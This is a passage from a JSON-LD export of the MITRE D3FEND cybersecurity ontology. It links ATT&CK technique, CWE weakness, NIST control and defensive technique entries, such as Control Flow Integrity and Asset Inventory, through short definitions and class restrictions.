      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures the information system to provide only essential capabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000381"
    },
    {
      "@id": "d3f:DS0032",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another",
      "rdfs:comment": "This data source captures events relating to containers and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Container (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-641",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-641",
      "d3f:definition": "The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.",
      "rdfs:label": "Improper Restriction of Names for Files and Other Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-99"
      }
    },
    {
      "@id": "d3f:IntranetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet network traffic is network traffic that does not traverse a given network's boundaries.",
      "rdfs:label": "Intranet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1036",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Revocation of Access Authorizations",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "AC-3(8)"
    },
    {
      "@id": "d3f:Browser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web browser (commonly referred to as a browser) is a software application for retrieving, presenting, and traversing information resources on the World Wide Web. An information resource is identified by a Uniform Resource Identifier (URI/URL) and may be a web page, image, video or other piece of content. Hyperlinks present in resources enable users easily to navigate their browsers to related resources. Although browsers are primarily intended to use the World Wide Web, they can also be used to access information provided by web servers in private networks or files in file systems.",
      "d3f:may-contain": {
        "@id": "d3f:BrowserExtension"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_browser"
      },
      "rdfs:label": "Browser",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13376000-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:N2d9dbe1389004a979305462335c102b7"
        }
      ]
    },
    {
      "@id": "_:N2d9dbe1389004a979305462335c102b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BrowserExtension"
      }
    },
    {
      "@id": "d3f:K-FoldCross-Validation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KFCV",
      "d3f:definition": "Cross-validation is a resampling procedure used to evaluate machine learning models on a limited data sample. The procedure has a single parameter called k that refers to the number of groups that a given data sample is to be split into. As such, the procedure is often called k-fold cross-validation. When a specific value for k is chosen, it may be used in place of k in the reference to the model, such as k=10 becoming 10-fold cross-validation",
      "d3f:kb-article": "## References\nK-Fold Cross-Validation. Machine Learning Mastery.  [Link](https://machinelearningmastery.com/k-fold-cross-validation/#:~:text=Cross%2Dvalidation%20is%20a%20resampling,k%2Dfold%20cross%2Dvalidation).",
      "rdfs:label": "K-Fold Cross-Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:MemoryModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process modifies allocated memory, potentially altering its content, behavior, or state.",
      "rdfs:label": "Memory Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:N4f67d661457c481890f3f35e84523346"
        }
      ]
    },
    {
      "@id": "_:N4f67d661457c481890f3f35e84523346",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1198",
      "@type": "owl:Class",
      "d3f:attack-id": "T1198",
      "d3f:definition": "In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.003",
      "rdfs:label": "SIP and Trust Provider Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1595.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.001",
      "d3f:definition": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.",
      "rdfs:label": "Scanning IP Blocks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Removal of Previous Versions of Software and Firmware",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PeripheralFirmwareVerification"
        },
        {
          "@id": "d3f:SoftwareUpdate"
        },
        {
          "@id": "d3f:SystemFirmwareVerification"
        }
      ],
      "rdfs:label": "SI-2(6)"
    },
    {
      "@id": "d3f:ImageScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "An image scanner -- often abbreviated to just scanner, is a device that optically scans images, printed text, handwriting or an object and converts it to a digital image. Commonly used in offices are variations of the desktop flatbed scanner where the document is placed on a glass window for scanning. Hand-held scanners, where the device is moved by hand, have evolved from text scanning \"wands\" to 3D scanners used for industrial design, reverse engineering, test and measurement, orthotics, gaming and other applications. Mechanically driven scanners that move the document are typically used for large-format documents, where a flatbed design would be impractical.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Image_scanner"
      },
      "rdfs:label": "Image Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:VideoInputDevice"
      },
      "skos:altLabel": "Scanner"
    },
    {
      "@id": "d3f:EX-0010.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.04",
      "d3f:definition": "A bootkit positions itself in the pre-OS boot chain so that it executes before normal integrity checks and can shape what the system subsequently trusts. After seizing early control, the bootkit can redirect image selection, patch kernels or flight binaries in memory, adjust device trees and driver tables, or install hooks that persist across warm resets. Some variants maintain shadow copies of legitimate images and present them to basic verification routines while steering actual execution to a modified payload; others manipulate fallback logic so recovery modes load attacker-controlled code. Because the boot path initializes memory maps, buses, and authentication material, a bootkit can also influence key/counter setup and gateway configurations, creating conditions favorable to later tactics. The central characteristic is precedence: by running first, the implant defines the reality higher layers observe, ensuring that every subsequent component launches under conditions curated by the attacker.",
      "d3f:modifies": {
        "@id": "d3f:BootLoader"
      },
      "rdfs:label": "Bootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Na9ea6ccf54934dcabed9281ecc13aaf9"
        }
      ],
      "skos:prefLabel": "Bootkit"
    },
    {
      "@id": "_:Na9ea6ccf54934dcabed9281ecc13aaf9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:Stacking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-STA",
      "d3f:definition": "Stacking is a method of using the results and predictions from one layer of ML models as inputs to another layer of ML models. Stacking (sometimes called stacked generalization) involves training a model to combine the predictions of several other learning algorithms.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Stacking",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-1059",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1059",
      "d3f:definition": "The product does not contain sufficient technical or engineering documentation (whether on paper or in electronic form) that contains descriptions of all the relevant software/hardware elements of the product, such as its usage, structure, architectural components, interfaces, design, implementation, configuration, operation, etc.",
      "rdfs:label": "Insufficient Technical Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-001695_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the execution of organization-defined unacceptable mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-10-07T00:00:00"
      },
      "rdfs:label": "CCI-001695"
    },
    {
      "@id": "d3f:Reference-SIA-OSDP-2-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.securityindustry.org/industry-standards/open-supervised-device-protocol/"
      },
      "d3f:kb-abstract": "Open Supervised Device Protocol (OSDP) is an access control communications standard developed by the Security Industry Association (SIA) to improve interoperability among access control and security products.",
      "d3f:kb-author": "Security Industry Association (SIA)",
      "d3f:kb-reference-of": {
        "@id": "d3f:ElectronicLockMonitoring"
      },
      "d3f:kb-reference-title": "Open Supervised Device Protocol (OSDP) v2.2",
      "rdfs:label": "Reference - SIA OSDP v2.2"
    },
    {
      "@id": "d3f:T1552.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1552.008",
      "d3f:definition": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.",
      "rdfs:label": "Chat Messages",
      "rdfs:subClassOf": {
        "@id": "d3f:T1552"
      }
    },
    {
      "@id": "d3f:SubstringMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "String-searching algorithms, sometimes called string-matching algorithms, are an important class of string algorithms that try to find a place where one or several strings (also called patterns) are found within a larger string or text.",
      "d3f:kb-article": "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
      "rdfs:label": "Substring Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:TA0106",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impair Process Control - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impair Process Control"
    },
    {
      "@id": "d3f:receives",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x receives y: The subject x acquires object y from a communication medium and transfers y into its local context for storage or processing.",
      "rdfs:label": "receives",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-107",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-107",
      "d3f:definition": "An unused validation form indicates that validation logic is not up-to-date.",
      "rdfs:label": "Struts: Unused Validation Form",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1078.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.002",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)",
      "d3f:uses": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:Nc681de3a243c4317adaae67cfd216e7b"
        }
      ]
    },
    {
      "@id": "_:Nc681de3a243c4317adaae67cfd216e7b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-33",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-33",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '....' (Multiple Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:PeripheralDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving external or auxiliary devices, such as USB drives, Thunderbolt peripherals, or Bluetooth devices. Peripheral events provide visibility into resource availability and potential unauthorized access.",
      "rdfs:label": "Peripheral Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N53740679e50e4f78bd147e50b47f7dfc"
        }
      ]
    },
    {
      "@id": "_:N53740679e50e4f78bd147e50b47f7dfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:UserAccountDetachPolicyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an IAM policy is detached from a user account.",
      "rdfs:label": "User Account Detach Policy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Ne1b29d5a78ea46c2842588af2cb3a299"
        }
      ]
    },
    {
      "@id": "_:Ne1b29d5a78ea46c2842588af2cb3a299",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountAttachPolicyEvent"
      }
    },
    {
      "@id": "d3f:CWE-767",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-767",
      "d3f:definition": "The product defines a public method that reads or modifies a private variable.",
      "rdfs:label": "Access to Critical Private Variable via Public Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-475",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-475",
      "d3f:definition": "The behavior of this function is undefined unless its control parameter is set to a specific value.",
      "rdfs:label": "Undefined Behavior for Input to API",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:T1680",
      "@type": "owl:Class",
      "d3f:attack-id": "T1680",
      "d3f:definition": "Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0109), or as a precursor to [Direct Volume Access](https://attack.mitre.org/techniques/T1006).",
      "rdfs:label": "Local Storage Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:WriteMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Write Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N27a9a54ec595466a81e39fd4967bec2f"
        }
      ]
    },
    {
      "@id": "_:N27a9a54ec595466a81e39fd4967bec2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:DeonticLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DL",
      "d3f:definition": "Deontic logic addresses the modality of obligations and norms; i.e., the modality of morality.",
      "d3f:kb-article": "## References\n1. Deontic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Deontic_logic)",
      "rdfs:label": "Deontic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:ServiceProvider",
      "@type": "owl:Class",
      "d3f:definition": "A service provider offers delivery of intangible outputs such as expertise, support, or access to resources to individuals, organizations, or other entities.",
      "rdfs:label": "Service Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6"
    },
    {
      "@id": "d3f:T1078.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.004",
      "d3f:definition": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)",
      "d3f:uses": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N31908ceb446949a4aeea01f0073aee63"
        }
      ]
    },
    {
      "@id": "_:N31908ceb446949a4aeea01f0073aee63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-229",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-229",
      "d3f:definition": "The product does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined.",
      "rdfs:label": "Improper Handling of Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:CWE-128",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-128",
      "d3f:definition": "Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \"wraps around\" to a very small, negative, or undefined value.",
      "rdfs:label": "Wrap-around Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:ControlFlowIntegrity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ControlFlowIntegrity"
      ],
      "d3f:d3fend-id": "D3-CFI",
      "d3f:definition": "Enforcing legal control flow transfers during application process execution.",
      "d3f:enforces": {
        "@id": "d3f:ControlFlowPolicy"
      },
      "d3f:kb-article": "## How it works\n\nControl flow integrity (CFI) restricts the destinations of control flow transfer instructions---particularly indirect function branches such as indirect function calls, jumps, and returns---such that execution can only proceed along paths determined to be valid at compile-time or load-time.\n\nCFI is typically implemented by instrumenting a program during compilation or binary rewriting. A control flow graph is constructed that defines the legitimate targets for each indirect control flow transfer. At runtime, before an indirect branch is taken, a check is performed to ensure that the target address is a member of the allowed target set. If the check fails, a defensive response such as process termination or exception handling is triggered.\n\nImplementations vary in granularity and enforcement mechanism:\n- Compiler-based CFI inserts runtime checks that validate indirect call targets against type or signature-based constraints.\n- Operating system–assisted CFI maintains a bitmap or table of valid indirect call targets and verifies them at runtime before allowing execution to continue.\n- Hardware-assisted CFI enforces control flow integrity using architectural features such as shadow stacks and specific CPU instructions.\n\nBy preventing execution from jumping to attacker-controlled or unintended code locations, CFI mitigates a wide range of exploitation techniques, including return-oriented programming (ROP), jump-oriented programming (JOP), and function pointer overwrite attacks.\n\n## Considerations\n\nWhile control flow integrity significantly raises the bar for control flow hijacking attacks, several considerations affect its effectiveness:\n- Granularity trade-offs: coarse-grained CFI allows larger target sets and may permit some unintended control flow paths, while fine-grained CFI offers stronger guarantees at the cost of performance and complexity.\n- Performance overhead: runtime checks or hardware enforcement 
may introduce execution overhead, particularly in applications with frequent indirect branches.\n- Compatibility limitations: some legacy code patterns, dynamic code generation, or just-in-time (JIT) compilation workflows may require special handling or reduced CFI enforcement.\n- Data-only attacks: CFI does not prevent attacks that manipulate program behavior without altering control flow, such as logic corruption or data-oriented programming.\n- Bypass techniques: if an attacker can redirect execution to a valid but unintended target within the allowed control flow graph, exploitation may still be possible.\n\nCFI is most effective when combined with complementary defenses such as stack canaries, memory safety checks, address space layout randomization (ASLR), and hardware-backed memory protections.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IntelControlEnforcementTechnology"
        },
        {
          "@id": "d3f:Reference-LLVMControlFlowIntegrity"
        },
        {
          "@id": "d3f:Reference-MicrosoftControlFlowGuard"
        }
      ],
      "d3f:monitors": [
        {
          "@id": "d3f:CallStack"
        },
        {
          "@id": "d3f:ShadowStack"
        }
      ],
      "d3f:validates": [
        {
          "@id": "d3f:ControlFlowGraph"
        },
        {
          "@id": "d3f:MemoryAddress"
        }
      ],
      "rdfs:label": "Control Flow Integrity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N43c4373ba22e4c529364b1f9903122bf"
        },
        {
          "@id": "_:N484badfc395347a18a7025cb8e3a6540"
        },
        {
          "@id": "_:Ndce575c3a5ad44ada630d00f999b64e9"
        },
        {
          "@id": "_:N1192cd7dc8f942c894c658e48b7abad5"
        },
        {
          "@id": "_:N567559bda3984df0967872f772480aa3"
        }
      ]
    },
    {
      "@id": "_:N43c4373ba22e4c529364b1f9903122bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enforces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlFlowPolicy"
      }
    },
    {
      "@id": "_:N484badfc395347a18a7025cb8e3a6540",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CallStack"
      }
    },
    {
      "@id": "_:Ndce575c3a5ad44ada630d00f999b64e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShadowStack"
      }
    },
    {
      "@id": "_:N1192cd7dc8f942c894c658e48b7abad5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlFlowGraph"
      }
    },
    {
      "@id": "_:N567559bda3984df0967872f772480aa3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:CWE-261",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-261",
      "d3f:definition": "Obscuring a password with a trivial encoding does not protect the password.",
      "rdfs:label": "Weak Encoding for Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:AssetInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AssetInventory"
      ],
      "d3f:d3fend-id": "D3-AI",
      "d3f:definition": "Asset inventorying identifies and records the organization's assets and enriches each inventory item with knowledge about their vulnerabilities.",
      "d3f:display-order": 1,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "d3f:synonym": [
        "Asset Discovery",
        "Asset Inventorying"
      ],
      "rdfs:label": "Asset Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N0ef5dceeae85418b97a81d2e055ad2b6"
        }
      ]
    },
    {
      "@id": "_:N0ef5dceeae85418b97a81d2e055ad2b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:Reference-FileIntegrityMonitoringinMicrosoftDefenderforCloud-Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileIntegrityMonitoring"
      },
      "d3f:kb-reference-title": "File Integrity Monitoring in Microsoft Defender for Cloud",
      "rdfs:label": "Reference - File Integrity Monitoring in Microsoft Defender for Cloud - Microsoft"
    },
    {
      "@id": "d3f:CWE-823",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-823",
      "d3f:definition": "The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.",
      "d3f:synonym": "Untrusted pointer offset",
      "rdfs:label": "Use of Out-of-range Pointer Offset",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-002/"
      },
      "d3f:kb-abstract": "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. Alerting when a \"Clear Event Log\" is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2016-04-002: User Activity from Clearing Event Logs",
      "rdfs:label": "Reference - CAR-2016-04-002: User Activity from Clearing Event Logs - MITRE"
    },
    {
      "@id": "d3f:CWE-502",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-502",
      "d3f:definition": "The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.",
      "d3f:may-be-weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "d3f:synonym": [
        "Marshaling, Unmarshaling",
        "PHP Object Injection",
        "Pickling, Unpickling"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:DeserializationFunction"
      },
      "rdfs:label": "Deserialization of Untrusted Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "_:N16db6db794264c63b97a27cf033b2d67"
        },
        {
          "@id": "_:Nb9aa9a532f91477885e5bd88b9137fba"
        }
      ]
    },
    {
      "@id": "_:N16db6db794264c63b97a27cf033b2d67",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "_:Nb9aa9a532f91477885e5bd88b9137fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
